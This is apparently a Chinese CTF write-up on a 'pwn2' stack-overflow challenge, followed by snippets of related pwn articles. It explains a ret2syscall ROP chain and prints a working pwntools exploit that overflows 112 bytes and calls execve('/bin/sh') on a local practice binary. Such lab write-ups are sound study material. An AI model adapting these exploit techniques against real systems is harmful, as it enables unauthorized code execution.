pwn2第二关

最新推荐文章于 2023-10-10 15:50:17 发布
最新推荐文章于 2023-10-10 15:50:17 发布
阅读量346 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18823653/article/details/88888032
版权

在这一关中,没有可以直接利用的system()函数让我们直接调用了。我们可以学习使用系统调用来进行操作。
首先看一下保护情况,只开了NX,
在这里插入图片描述
同样是get()存在溢出
在这里插入图片描述
syscall的函数调用规范为execve("/bin/sh",0,0)
汇编语句如下

pop ax     # 系统调用号载入, execve为0xb
pop bx    #/bin/sh
pop cx   #0
pop dx   #0
int 0x80

然后用ROPgadget查找汇编语句
ROPgadget --binary pwn2 --only ‘pop|ret’|grep ‘ax’
在这里插入图片描述
然后查找bx,cx,dx,int 0x80
在这里插入图片描述
溢出和上一关一样112个字节
exp如下:

from pwn import *
p=process('./pwn2')
pop_ax_ret = 0x080bb196
pop_cx_bx_ret = 0x0806eb91
bin_sh=0x080be408
pop_dx_ret =0x0806eb6a
int_0x80=0x08049421
payload=flat(['a'*112,pop_ax_ret,0xb,pop_cx_bx_ret,0,bin_sh,pop_dx_ret,0,int_0x80])
p.recvline()
p.sendline(payload)
p.interactive()
Gao's blog
关注
pwn基础ROP-碎片组合
admin的博客
10-03 366
题源:基本 ROP - CTF Wiki (ctf-wiki.org)的ret2syscall ①:老套路,先检查。 没有RXW可执行段。而且NX保护打开了。 ②:拉到IDA反汇编。 没有system,也没有可直接利用的后门函数,但是有bin/sh。什么也没有。而且段都是不可执行段,也不能直接写入整个shellcode段。 但是还有gets函数,天无绝人之路,又是栈溢出的类型。看来得自己拿碎片构造rop了(得存在所有的碎片才行)。 (这个过程起始就类似于堆积木:积木碎片在房...
习题-pwn2
m0_49959202的博客
09-18 159
文章目录pwn21.程序分析2.栈帧设计3.exp编写 pwn2 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现pie闭: ida分析程序,发现存在system函数,因此可以到plt内找到system: 分析vulnerable_function(),可以得到需要溢出的长度为0x88 + 4 =136+4 = 140,同时存在read(),可以用来溢出 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3YpmnStC-1631942444
Jarvis Oj Pwn 学习笔记-level2
baoan4763的博客
05-31 167
32位构造栈参数溢出! 恭敬地呈上链接: https://files.cnblogs.com/files/Magpie/level2.rar nc pwn2.jarvisoj.com 9878 首先....日常checksec: 程序扔进IDA锅里: 找到了溢出点~下面我们开始食用: 既然有调用system函数,肯定是可以直接call一波的,只是还缺一个参数,我...
170719 pwn-pwn2
whklhhhh的博客
07-20 454
1625-5 王子昂 总结《2017年7月19日》 【连续第290天总结】 A. pwn入门 B. pwn2 惯例用binwalk查看pwn2,发现是32位ELF文件,拖入IDA中查看,发现这次直接就是foo函数: 可以看到,buf的长度为0x1C,(即与bp的差) 也就是说,栈的形式为: buf-bp-ret 这次程序中没有getFlag函数,因此无法通过覆盖ret的方式来执
2022 网信柏鹭杯 pwn2 note2
z1r0的博客
09-17 695
因2.34之后取消了malloc,free hook这两个在堆pwn中用的最多的hook,roderick师傅分享的house of apple学习了一下,是一个非常好用的调用链,包括house of emma, house of kiwi, house of banana, house of pig, house of cat都是极好的调用链,前天的网信柏鹭杯里的pwn2是2.35的,笔者学完apple之后这里拿的2.34做的,只需要改偏移就可以打通2.35的。
ctf.bugku ctf题目详解——pwn2
yeshen4328的专栏
05-26 1210
ctf.bugku ctf题目详解——pwn2 题目 程序分配了一个栈上的变量s,长度为0x30,并一开始置0. 9行开始从外部读取0x100的数据到s中,由此可见此处存在一个栈溢出。 同时使用ida打开程序之后发现还存在一个get_shell的函数: 于是我们需要想方法利用溢出来调用这个get_shell函数。 x64函数调用规则 解题之前我们先学习下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e
Pwn2Own 2010:Windows 7上的Internet Explorer 8漏洞利用解析
第二部分:触发漏洞并禁用DEP 在获取到.dll文件的地址之后,攻击者利用这些信息触发一个利用,该利用采用了ret2lib技术来禁用DEP,DEP是防止代码注入的一种防御机制。通过禁用DEP,攻击者能够使程序执行其自定义的...
2022ISCC PWN
山高路远
07-05 2219
2022ISCC
pwn(二)
小明的小书包Ya
09-28 2263
pwn(二) 写在文章开头的话:之前一直在学习pwn入门,但是pwn一直是门槛比较高的一门学问,于是前一段时间懈怠了,接下来一段时间会一天写一个模块的writeup,如果遇到比较难的,不好理解的,我也会尽量理解好了,认为自己有比较好的理解方法的时候,才会来写出自己的一些看法和理解,可能会有两天到三天来查阅大量 文档才会有一个比较好的理解 - 荆轲刺秦王,潜心学安全 ...
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
热门推荐
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 1498
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
BUUCTF-pwn(15)
njh18790816639的博客
02-13 2707
gyctf_2020_some_thing_interesting 经典UAF漏洞! Allocate申请函数! Free释放函数! 全保护开启,故我们利用格式化字符串漏洞泄露libc地址,从而得到malloc_hook地址。然后利用UAF漏洞修改malloc_hook为one_gadget,此时进行申请操作便可获取权限! from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './gyctf_2
Writeup bugku刷题 pwn2
Migraine‘s Blog
05-13 2384
概述:bugku新出的pwn题,练一练手 键字:栈溢出 x64 网址:https://ctf.bugku.com/challenges 分析一下代码,发现非常明显是x64下的栈溢出。 Pwntools生成shellcode >>> from pwn import * >>> context(os='linux...
pwn2wp
weixin_51458449的博客
03-03 205
#刷题第一天 #突然好像在get到了调试 先vi exp.py写个exp,写的过程中加个 attach(./name)和raw_input 之后就可以链接本地开始打。 #记一个简单的pwn题 1.先加个可执行权限,再跑跑 ls了一下发现灰的,那就加个执行权限,chmod u+x pwn。完了没事儿跑跑。 出来一堆乱七八糟的字母,随便回两个,它也回我们一样的,然后推出了,笑死。 2.checksec看看开了哪些保护 查查看位数和保护机制,笑了。64位,只开了nx。 3.okk,上ida 先看逻辑。 主函
Spring Cloud 全面学习案例集,含多种功能示例与教程.zip
11-14
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
AudioStream 1.5.unitypackage
11-14
AudioStream 1.5.unitypackage
驾驭未来:Simulink中PMSM永磁同步电机控制深度解析
11-14
在现代工业自动化和电动汽车领域,永磁同步电机(PMSM)因其高效率、高性能和紧凑设计而备受青睐。本文将详细介绍如何在Simulink中实现PMSM的控制,包括矢量控制(FOC)策略的实现,以及必要的代码示例,旨在为工程师和研究者提供实用的指导。 一、PMSM控制概述 永磁同步电机(PMSM)以其高功率密度、高效率和优异的动态响应而广泛应用于工业和汽车领域。在Simulink中实现PMSM控制,通常采用矢量控制(Field-Oriented Control, FOC)策略,该策略通过磁场定向控制实现电机转矩和速度的精确控制。 二、PMSM数学模型与Simulink实现 PMSM的数学模型包括电压方程、磁链方程和转矩方程。在Simulink中,我们可以通过构建相应的模块来实现这些方程。 1. PMSM数学模型 电压方程: u d = R s i d − ω e L q i q + L d d i d d t + ω e ψ f u d ​ =Rsid−ω e ​ L q ​ iq+
Jupyter_B 站直播事件 webhook 和开播邮件提醒.zip
11-14
Jupyter-Notebook
合成控制法与收敛性分析资料最新集.zip
最新发布
11-14
合成控制法与收敛性分析资料最新集.zip
Gartner发布将漏洞管理发展为暴露管理指南:模拟实时攻击场景的对抗性暴露验证将替代传统渗透测试.pdf
11-14
Gartner发布将漏洞管理发展为暴露管理指南:模拟实时攻击场景的对抗性暴露验证将替代传统渗透测试.pdf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值